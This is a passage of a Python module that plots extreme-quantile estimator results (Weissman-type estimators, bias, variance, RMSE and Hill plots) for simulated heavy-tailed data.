aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaab"
res = str_str(haystack, needle)
print(res)
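The snippet above calls a `str_str(haystack, needle)` helper that is not defined in this chunk. A minimal sketch under the usual strStr contract (index of the first occurrence of `needle` in `haystack`, `-1` if absent, `0` for an empty needle) — the real helper may well use KMP or another linear-time search, which matters for adversarial inputs like the long runs of `'a'` above:

```python
def str_str(haystack: str, needle: str) -> int:
    """Return the index of the first occurrence of needle in haystack, or -1.

    Sketch only: str.find already implements this contract; a production
    version for worst-case inputs would use KMP or two-way string matching.
    """
    if not needle:
        return 0
    return haystack.find(needle)

print(str_str("hello", "ll"))   # 2
print(str_str("aaaaa", "bba"))  # -1
```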
| 1,521.175 | 50,017 | 0.993278 | 112 | 60,847 | 539.508929 | 0.267857 | 0.000397 | 0.000695 | 0.000662 | 0.002847 | 0.002085 | 0.001357 | 0.001357 | 0.001357 | 0.001357 | 0 | 0.000182 | 0.005045 | 60,847 | 39 | 50,018 | 1,560.179487 | 0.997919 | 0.001315 | 0 | 0.333333 | 0 | 0 | 0.987607 | 0.987476 | 0 | 1 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0 | 0 | 0.333333 | 0.037037 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e5b2ae8390c9943c0ef0a7d822b1ecb19ca1591c | 96 | py | Python | topnum/search_methods/topic_bank/__init__.py | machine-intelligence-laboratory/OptimalNumberOfTopics | 87267223987a4cb54b3f0ec431e87ee684044c7b | [
"MIT"
] | 5 | 2020-05-06T14:13:54.000Z | 2020-09-06T15:54:01.000Z | topnum/search_methods/topic_bank/__init__.py | machine-intelligence-laboratory/OptimalNumberOfTopics | 87267223987a4cb54b3f0ec431e87ee684044c7b | [
"MIT"
] | 54 | 2020-02-10T07:08:31.000Z | 2020-09-08T21:45:39.000Z | topnum/search_methods/topic_bank/__init__.py | machine-intelligence-laboratory/OptimalNumberOfTopics | 87267223987a4cb54b3f0ec431e87ee684044c7b | [
"MIT"
] | 2 | 2021-01-16T08:40:25.000Z | 2021-06-04T05:35:36.000Z | from .bank_update_method import BankUpdateMethod
from .topic_bank_method import TopicBankMethod
| 32 | 48 | 0.895833 | 12 | 96 | 6.833333 | 0.666667 | 0.292683 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 96 | 2 | 49 | 48 | 0.931818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e5da31f7a8c5416a5ce0fafdbc6f86e10f5a25b7 | 143 | py | Python | test/tests/ctypes_test.py | jmgc/pyston | 9f672c1bbb75710ac17dd3d9107da05c8e9e8e8f | [
"BSD-2-Clause",
"Apache-2.0"
] | 1 | 2020-02-06T14:28:45.000Z | 2020-02-06T14:28:45.000Z | test/tests/ctypes_test.py | jmgc/pyston | 9f672c1bbb75710ac17dd3d9107da05c8e9e8e8f | [
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | test/tests/ctypes_test.py | jmgc/pyston | 9f672c1bbb75710ac17dd3d9107da05c8e9e8e8f | [
"BSD-2-Clause",
"Apache-2.0"
] | 1 | 2020-02-06T14:29:00.000Z | 2020-02-06T14:29:00.000Z | from ctypes import *
s = "tmp"
ap = create_string_buffer(s)
print type(ap)
print type(c_void_p.from_param(ap))
print type(cast(ap, c_char_p))
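The test above uses Python 2 print statements, consistent with Pyston 1.x targeting Python 2. A Python 3 rendering of the same checks (note that `create_string_buffer` requires `bytes` rather than `str` on Python 3):

```python
from ctypes import create_string_buffer, c_void_p, c_char_p, cast

s = b"tmp"  # bytes, not str, on Python 3
ap = create_string_buffer(s)      # Array of c_char, length len(s) + 1
print(type(ap))
print(type(c_void_p.from_param(ap)))
print(type(cast(ap, c_char_p)))   # <class 'ctypes.c_char_p'>
```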
| 17.875 | 35 | 0.741259 | 28 | 143 | 3.535714 | 0.607143 | 0.272727 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125874 | 143 | 7 | 36 | 20.428571 | 0.792 | 0 | 0 | 0 | 0 | 0 | 0.020979 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
f92d1728bec9d3b509bc5af926af706e927377e4 | 80 | py | Python | pysiclib/api/linalg.py | ShameekConyers/sicnumerical | dc5035e5d922cb8e4341c5fbd88adba4f5d09bea | [
"MIT"
] | null | null | null | pysiclib/api/linalg.py | ShameekConyers/sicnumerical | dc5035e5d922cb8e4341c5fbd88adba4f5d09bea | [
"MIT"
] | null | null | null | pysiclib/api/linalg.py | ShameekConyers/sicnumerical | dc5035e5d922cb8e4341c5fbd88adba4f5d09bea | [
"MIT"
] | null | null | null | from .._pysiclib import linalg as _impl_linalg
from .._pysiclib.linalg import *
| 26.666667 | 46 | 0.8 | 11 | 80 | 5.454545 | 0.545455 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 80 | 2 | 47 | 40 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0077a1fcd62adc3d1c1934c38ac9190c1d85d2b6 | 25 | py | Python | OOP/welcome.py | Ahmad-Fahad/Python | 5a5f8f3395f7085947430b8309f6af70b2e25a77 | [
"Apache-2.0"
] | null | null | null | OOP/welcome.py | Ahmad-Fahad/Python | 5a5f8f3395f7085947430b8309f6af70b2e25a77 | [
"Apache-2.0"
] | null | null | null | OOP/welcome.py | Ahmad-Fahad/Python | 5a5f8f3395f7085947430b8309f6af70b2e25a77 | [
"Apache-2.0"
] | null | null | null | print "Welcome to Python" | 25 | 25 | 0.8 | 4 | 25 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12 | 25 | 1 | 25 | 25 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0.653846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
008b8b986e75215552f445451e82aa92b20fe457 | 27 | py | Python | idevbca/__init__.py | forzadraco/idevbca | c74da4b74ae01c76c5390fe2e7985bec5408144b | [
"MIT"
] | 1 | 2017-12-19T18:53:21.000Z | 2017-12-19T18:53:21.000Z | idevbca/__init__.py | forzadraco/idevbca | c74da4b74ae01c76c5390fe2e7985bec5408144b | [
"MIT"
] | null | null | null | idevbca/__init__.py | forzadraco/idevbca | c74da4b74ae01c76c5390fe2e7985bec5408144b | [
"MIT"
] | null | null | null | from idevbca.Bca import Bca | 27 | 27 | 0.851852 | 5 | 27 | 4.6 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 27 | 1 | 27 | 27 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
00c492e73949906fdce2a39b27d7d8691ead651f | 2,653 | py | Python | tests/anonlink_test.py | Sam-Gresh/linkage-agent-tools | f405c7efe3fa82d99bc047f130c0fac6f3f5bf82 | [
"Apache-2.0"
] | null | null | null | tests/anonlink_test.py | Sam-Gresh/linkage-agent-tools | f405c7efe3fa82d99bc047f130c0fac6f3f5bf82 | [
"Apache-2.0"
] | null | null | null | tests/anonlink_test.py | Sam-Gresh/linkage-agent-tools | f405c7efe3fa82d99bc047f130c0fac6f3f5bf82 | [
"Apache-2.0"
] | null | null | null | import pytest
import os
from tinydb import TinyDB, Query
from dcctools.anonlink import Results
def test_insert_results():
db_location = 'tests/test_db.json'
systems = ['a', 'b', 'c']
project = 'name-dob'
anonlink_results = {'groups': [[[0, 1], [1, 2], [2, 3]],
[[1, 5], [2, 6]],
[[0, 8], [2, 9]]]}
if os.path.exists(db_location):
os.remove(db_location)
database = TinyDB(db_location)
r = Results(systems, project, anonlink_results)
r.insert_results(database)
assert len(database) == 3
RecordGroup = Query()
doc = database.search(RecordGroup['a'].any([1]))
assert doc[0]['b'] == [2]
assert doc[0]['c'] == [3]
doc = database.search(RecordGroup['b'].any([5]))
assert doc[0]['c'] == [6]
doc = database.search(RecordGroup['a'].any([8]))
assert doc[0]['c'] == [9]
def test_insert_conflicting_results_split_group():
db_location = 'tests/test_db.json'
systems = ['a', 'b']
project1 = 'name-dob'
anonlink_results1 = {'groups': [[[0, 1], [1, 2]],
[[0, 8], [1, 9]]]}
if os.path.exists(db_location):
os.remove(db_location)
database = TinyDB(db_location)
r = Results(systems, project1, anonlink_results1)
r.insert_results(database)
assert len(database) == 2
RecordGroup = Query()
doc = database.search(RecordGroup['a'].any([1]))
assert doc[0]['b'] == [2]
doc = database.search(RecordGroup['b'].any([9]))
assert doc[0]['a'] == [8]
project2 = 'name-sex'
anonlink_results2 = {'groups': [[[0, 1], [1, 9]],
[[0, 20], [1, 30]]]}
r = Results(systems, project2, anonlink_results2)
r.insert_results(database)
assert len(database) == 2
doc = database.search(RecordGroup['a'].any([1]))
assert doc[0]['b'] == [2, 9]
def test_insert_conflicting_results_same_group():
db_location = 'tests/test_db.json'
systems = ['a', 'b']
project1 = 'name-dob'
anonlink_results1 = {'groups': [[[0, 1], [1, 2]],
[[0, 8], [1, 9]]]}
if os.path.exists(db_location):
os.remove(db_location)
database = TinyDB(db_location)
r = Results(systems, project1, anonlink_results1)
r.insert_results(database)
assert len(database) == 2
RecordGroup = Query()
doc = database.search(RecordGroup['a'].any([1]))
assert doc[0]['b'] == [2]
doc = database.search(RecordGroup['b'].any([9]))
assert doc[0]['a'] == [8]
project2 = 'name-sex'
anonlink_results2 = {'groups': [[[0, 1], [1, 10]],
[[0, 20], [1, 30]]]}
r = Results(systems, project2, anonlink_results2)
r.insert_results(database)
assert len(database) == 3
doc = database.search(RecordGroup['a'].any([1]))
assert doc[0]['b'] == [2, 10]
assert len(doc[0]['run_results']) == 2
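As the tests above show, anonlink's `groups` are lists of `[system_index, record_index]` pairs, and `Results.insert_results` stores one document per linked group, keyed by system name. The mapping step can be sketched without TinyDB; this is a hypothetical illustration inferred from the assertions, not the `dcctools` implementation (which additionally merges conflicting groups across runs and tracks `run_results`):

```python
def groups_to_docs(systems, groups):
    """Turn anonlink-style groups ([[system_idx, record_idx], ...]) into
    per-system record-index mappings, mirroring what the tests assert."""
    docs = []
    for group in groups:
        doc = {}
        for system_idx, record_idx in group:
            doc.setdefault(systems[system_idx], []).append(record_idx)
        docs.append(doc)
    return docs

docs = groups_to_docs(['a', 'b', 'c'], [[[0, 1], [1, 2], [2, 3]]])
# docs[0] == {'a': [1], 'b': [2], 'c': [3]}
```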
| 24.118182 | 58 | 0.619676 | 376 | 2,653 | 4.257979 | 0.151596 | 0.074953 | 0.062461 | 0.157402 | 0.853217 | 0.846346 | 0.766396 | 0.766396 | 0.740162 | 0.718926 | 0 | 0.048248 | 0.171881 | 2,653 | 109 | 59 | 24.33945 | 0.680473 | 0 | 0 | 0.697368 | 0 | 0 | 0.060686 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 1 | 0.039474 | false | 0 | 0.052632 | 0 | 0.092105 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
00e266b27758bccaaa6aca6e74acbe6b2444e13f | 93 | py | Python | mlbriefcase/python/__init__.py | Bhaskers-Blu-Org2/Briefcase | f551079b05d3f8494cdff6a0b393969def5a2443 | [
"MIT"
] | 2 | 2020-05-04T12:59:05.000Z | 2020-05-05T09:31:43.000Z | mlbriefcase/python/__init__.py | Bhaskers-Blu-Org2/Briefcase | f551079b05d3f8494cdff6a0b393969def5a2443 | [
"MIT"
] | 4 | 2020-02-05T11:34:51.000Z | 2020-02-05T11:35:12.000Z | mlbriefcase/python/__init__.py | microsoft/Briefcase | f551079b05d3f8494cdff6a0b393969def5a2443 | [
"MIT"
] | 5 | 2020-06-30T16:02:57.000Z | 2021-09-15T06:39:08.000Z | from .sqlalchemy import *
from .keyring import *
from .jupyterlab_credentialprovider import * | 31 | 44 | 0.817204 | 10 | 93 | 7.5 | 0.6 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.11828 | 93 | 3 | 44 | 31 | 0.914634 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
daa690964f4a1bf8e24289407c95e06525ab88a4 | 44 | py | Python | mmcv_custom/__init__.py | MendelXu/mmdetection-1 | 0501bdf54fc62a04c44b241829af9a8397c45ca9 | [
"Apache-2.0"
] | 2 | 2021-06-24T19:36:04.000Z | 2021-06-24T20:32:31.000Z | mmcv_custom/__init__.py | MendelXu/mmdetection-1 | 0501bdf54fc62a04c44b241829af9a8397c45ca9 | [
"Apache-2.0"
] | null | null | null | mmcv_custom/__init__.py | MendelXu/mmdetection-1 | 0501bdf54fc62a04c44b241829af9a8397c45ca9 | [
"Apache-2.0"
] | 1 | 2021-01-19T05:33:48.000Z | 2021-01-19T05:33:48.000Z | from .fileio import *
from .runner import *
| 14.666667 | 21 | 0.727273 | 6 | 44 | 5.333333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 44 | 2 | 22 | 22 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
dac0824cb6ab4dfa42fd08ec774aec2cd56bea8c | 66 | py | Python | inventory/tests.py | ohing504/django-inventory | 1a262b826e8e904a7196fe0f0c0645dcd428f3f9 | [
"MIT"
] | null | null | null | inventory/tests.py | ohing504/django-inventory | 1a262b826e8e904a7196fe0f0c0645dcd428f3f9 | [
"MIT"
] | 2 | 2020-06-05T17:12:32.000Z | 2021-06-10T18:12:45.000Z | inventory/tests.py | ohing504/django-inventory | 1a262b826e8e904a7196fe0f0c0645dcd428f3f9 | [
"MIT"
] | null | null | null | from django.test import TestCase
def test_dummy():
assert 1
| 11 | 32 | 0.727273 | 10 | 66 | 4.7 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019231 | 0.212121 | 66 | 5 | 33 | 13.2 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
daf2eb8734aa87adedd5d42f9870b8edd5e6a06b | 16,037 | py | Python | extreme/visualization.py | michael-allouche/refined-weissman | f925acf4953e75d3bc5f6a2fd533a021b2c999d5 | [
"MIT"
] | null | null | null | extreme/visualization.py | michael-allouche/refined-weissman | f925acf4953e75d3bc5f6a2fd533a021b2c999d5 | [
"MIT"
] | null | null | null | extreme/visualization.py | michael-allouche/refined-weissman | f925acf4953e75d3bc5f6a2fd533a021b2c999d5 | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
from extreme.estimators import evt_estimators, real_estimators, list_estimators, ExtremeQuantileEstimator, random_forest_k
from extreme.data_management import DataSampler
from pathlib import Path
import matplotlib.pyplot as plt
import seaborn as sns
import os
def evt_quantile_plot(n_replications, n_data, distribution, params, n_quantile, saved=False):
"""extreme quantile plot of just the evt estimatorsat level 1/2n for different replications with variance and MSE"""
pathdir = Path("ckpt", n_quantile, distribution, "extrapolation", str(params))
pathdir.mkdir(parents=True, exist_ok=True)
    anchor_points = np.arange(2, n_data)  # 2, ..., n-1
if n_quantile == "2n":
EXTREME_ALPHA = 1 / (2 * n_data) # extreme alpha
elif n_quantile == "n":
EXTREME_ALPHA = 1 / (n_data) # extreme alpha
else:
        raise ValueError("Unknown 'n_quantile'. Please choose between {'n', '2n'}.")
data_sampler = DataSampler(distribution=distribution, params=params)
real_quantile = data_sampler.ht_dist.tail_ppf(1 / EXTREME_ALPHA) # real extreme quantile
try:
dict_evt = np.load(Path(pathdir, "evt_estimators_rep{}.npy".format(n_replications)), allow_pickle=True)[()]
except FileNotFoundError:
dict_evt = evt_estimators(n_replications, n_data, distribution, params, n_quantile, return_full=True)
fig, axes = plt.subplots(3, 1, figsize=(15, 3 * 5), sharex=False, squeeze=False) # 3 plots: quantile, var, mse
for estimator in dict_evt.keys():
axes[0, 0].plot(anchor_points, dict_evt[estimator]["series"],
label="{} (rmse={:.2f})".format(estimator, dict_evt[estimator]["rmse_bestK"],
), linestyle="-.")
axes[1, 0].plot(anchor_points, dict_evt[estimator]["var"],
label="{} (rmse={:.2f})".format(estimator, dict_evt[estimator]["rmse_bestK"],
), linestyle="-.")
axes[2, 0].plot(anchor_points, dict_evt[estimator]["rmse"],
label="{} (rmse={:.2f})".format(estimator, dict_evt[estimator]["rmse_bestK"],
), linestyle="-.")
axes[0, 0].hlines(y=real_quantile, xmin=0., xmax=n_data,
label="reference line", color="black", linestyle="--")
axes[0, 0].legend()
axes[0, 0].spines["left"].set_color("black")
axes[0, 0].spines["bottom"].set_color("black")
# title / axis
axes[0, 0].set_xlabel(r"anchor point $k$")
axes[0, 0].set_ylabel("quantile")
axes[0, 0].set_title("Bias estimator")
axes[1, 0].set_xlabel(r"anchor point $k$")
axes[1, 0].set_ylabel("variance")
axes[1, 0].set_title("Variance estimator")
axes[1, 0].spines["left"].set_color("black")
axes[1, 0].spines["bottom"].set_color("black")
axes[2, 0].set_xlabel(r"anchor point $k$")
axes[2, 0].set_ylabel("RMSE")
axes[2, 0].set_title("RMSE estimator")
axes[2, 0].spines["left"].set_color("black")
axes[2, 0].spines["bottom"].set_color("black")
# y_lim
# axes[0, 0].set_ylim(real_quantile*0.8, real_quantile*1.2) # 100
axes[0, 0].set_ylim(real_quantile*0.5, real_quantile*2) #real_quantile*3) # QUANTILE
axes[1, 0].set_ylim(np.min(dict_evt["CW"]["var"]) * 0.5, np.min(dict_evt["CW"]["var"]) * 2) # VARIANCE
# axes[1, 0].set_ylim(0, 22) # VARIANCE
axes[2, 0].set_ylim(0, 1) # MSE
fig.tight_layout()
fig.suptitle("Estimator plot \n{}: {}".format(distribution.upper(), str(params).upper()), fontweight="bold", y=1.04)
sns.despine()
if saved:
pathdir = Path("imgs")
pathdir.mkdir(parents=True, exist_ok=True)
filename = "simulations-{}-{}-{}-{}-{}-".format(distribution, params, n_replications, n_data, n_quantile)
# plt.savefig(pathdir / "{}.eps".format(filename), format="eps")
plt.savefig(pathdir / "{}.jpg".format(filename))
return
def evt_quantile_plot_paper(n_replications, n_data, distribution, params, n_quantile, plot_type, saved=False):
"""extreme quantile plot of just the evt estimatorsat level 1/2n for different replications with variance and MSE"""
# LIST_ESTIMATORS_PAPER = ["W", "RW", "CW", "CHps", "PRBps"]
LIST_ESTIMATORS_PAPER = ["W", "RW"]
pathdir = Path("ckpt", n_quantile, distribution, "extrapolation", str(params))
pathdir.mkdir(parents=True, exist_ok=True)
    anchor_points = np.arange(2, n_data)  # 2, ..., n-1
if n_quantile == "2n":
EXTREME_ALPHA = 1 / (2 * n_data) # extreme alpha
elif n_quantile == "n":
EXTREME_ALPHA = 1 / (n_data) # extreme alpha
else:
        raise ValueError("Unknown 'n_quantile'. Please choose between {'n', '2n'}.")
data_sampler = DataSampler(distribution=distribution, params=params)
real_quantile = data_sampler.ht_dist.tail_ppf(1 / EXTREME_ALPHA) # real extreme quantile
try:
dict_evt = np.load(Path(pathdir, "evt_estimators_rep{}.npy".format(n_replications)), allow_pickle=True)[()]
except FileNotFoundError:
dict_evt = evt_estimators(n_replications, n_data, distribution, params, n_quantile, return_full=True)
fig, axes = plt.subplots(1, 1, figsize=(15, 7), sharex=False, squeeze=False)
for estimator in LIST_ESTIMATORS_PAPER:
if plot_type == "bias":
axes[0, 0].plot(anchor_points, dict_evt[estimator]["series"], linestyle="-", linewidth=2)
axes[0, 0].hlines(y=real_quantile, xmin=0., xmax=n_data, color="black", linestyle="--", linewidth=2)
elif plot_type == "rmse":
axes[0, 0].plot(anchor_points, dict_evt[estimator]["rmse"], linestyle="-", linewidth=2)
axes[0, 0].spines["left"].set_color("black")
axes[0, 0].spines["bottom"].set_color("black")
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
if plot_type == "bias":
axes[0, 0].set_ylim(real_quantile * 0.95, real_quantile * 1.2) # real_quantile*3) # QUANTILE
elif plot_type == "rmse":
axes[0, 0].set_ylim(0, .2) # MSE
fig.tight_layout()
sns.despine()
if saved:
pathdir = Path("imgs")
pathdir.mkdir(parents=True, exist_ok=True)
filename = "{}-{}-{}-{}-{}-{}-".format(plot_type, distribution, params, n_replications, n_data, n_quantile)
plt.savefig(pathdir / "{}.eps".format(filename), format="eps")
return
def evt_hill_plot(n_replications, n_data, distribution, params, n_quantile, saved=False):
sns.set_style("whitegrid", {'grid.linestyle': '--'})
pathdir = Path("ckpt", n_quantile, distribution, "extrapolation", str(params))
pathdir.mkdir(parents=True, exist_ok=True)
    anchor_points = np.arange(2, n_data)  # 2, ..., n-1
if n_quantile == "2n":
EXTREME_ALPHA = 1 / (2 * n_data) # extreme alpha
elif n_quantile == "n":
EXTREME_ALPHA = 1 / (n_data) # extreme alpha
else:
        raise ValueError("Unknown 'n_quantile'. Please choose between {'n', '2n'}.")
data_sampler = DataSampler(distribution=distribution, params=params)
X_order = data_sampler.simulate_quantiles(n_data, seed=1) # new quantiles X_1,n, ..., X_n,n
fig, axes = plt.subplots(1, 1, figsize=(15, 7), sharex=False, squeeze=False) # 3 plots: quantile, var, mse
evt_estimators = ExtremeQuantileEstimator(X=X_order, alpha=EXTREME_ALPHA)
hill_gammas = [evt_estimators.hill(k_anchor) for k_anchor in anchor_points]
bestK = random_forest_k(np.array(hill_gammas), n_forests=10000, seed=42)
k_prime = evt_estimators.get_kprime_rw(n_data-1)[0]
anchor_points_prime = np.arange(2, int(k_prime)+1)
hill_gammas_prime = [evt_estimators.hill(k_anchor) for k_anchor in anchor_points_prime]
axes[0, 0].plot(anchor_points, hill_gammas, color="black")
# axes[0, 0].scatter(bestK , hill_gammas[bestK], s=200, color="red", marker="^")
axes[0, 0].plot(anchor_points_prime, hill_gammas_prime, color="red")
axes[0, 0].hlines(y=params["evi"], xmin=0., xmax=n_data, color="black", linestyle="--")
axes[0, 0].spines["left"].set_color("black")
axes[0, 0].spines["bottom"].set_color("black")
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
# y_lim
